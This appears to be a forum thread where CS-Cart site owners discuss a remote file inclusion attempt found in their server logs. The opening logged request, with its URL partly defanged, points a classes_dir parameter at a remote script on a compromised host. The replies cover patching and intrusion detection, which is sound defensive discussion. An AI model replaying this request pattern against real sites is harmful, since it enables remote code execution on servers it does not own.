Host: 209.126.[COLOR=Red]XXX[/COLOR].[COLOR=Red]XXX [/COLOR]
/classes/phpmailer/class.cs_phpmailer.[COLOR=Red]XXX[/COLOR]?classes_dir=hXXp://Exploited_server/themes/.x/thejoke.txt?
Http Code: 403 Date: Oct 11 11:32:32 Http Version: HTTP/1.1 Size in Bytes: 48998
Referer: -
Agent: libwww-perl/5.76
Is what I have listed in the cpanel live users records
And I have followed a few such links and each one that I have followed was some sort of exploit text script.
That address should be edited out to avoid further spreading of these harmfull exploits.
I get hundreds of these each day in my audit logs
This was a well known exploit present in versions 1.3.3 and below. It has been corrected we are told in later builds. There are similar problems also regarding index.php and install.php also said to be corrected.
These are extremely common and in most cases are attempted by automated scripts scanning for Cs-Cart installs. These files are nearly always located on innocent servers that have been exploited so recourse is minimal.
It is always possible for new exploits such as this to surface in any PHP script so server security should be a primary concern of anyone running a site they wish to be successful.
The host you choose should be running an intrusion detection system with a ruleset tailored to the type of client sites they host. This will prevent most attempts to include such files even if the exploit is valid. Generic rule sets are not adequate because they are too loose.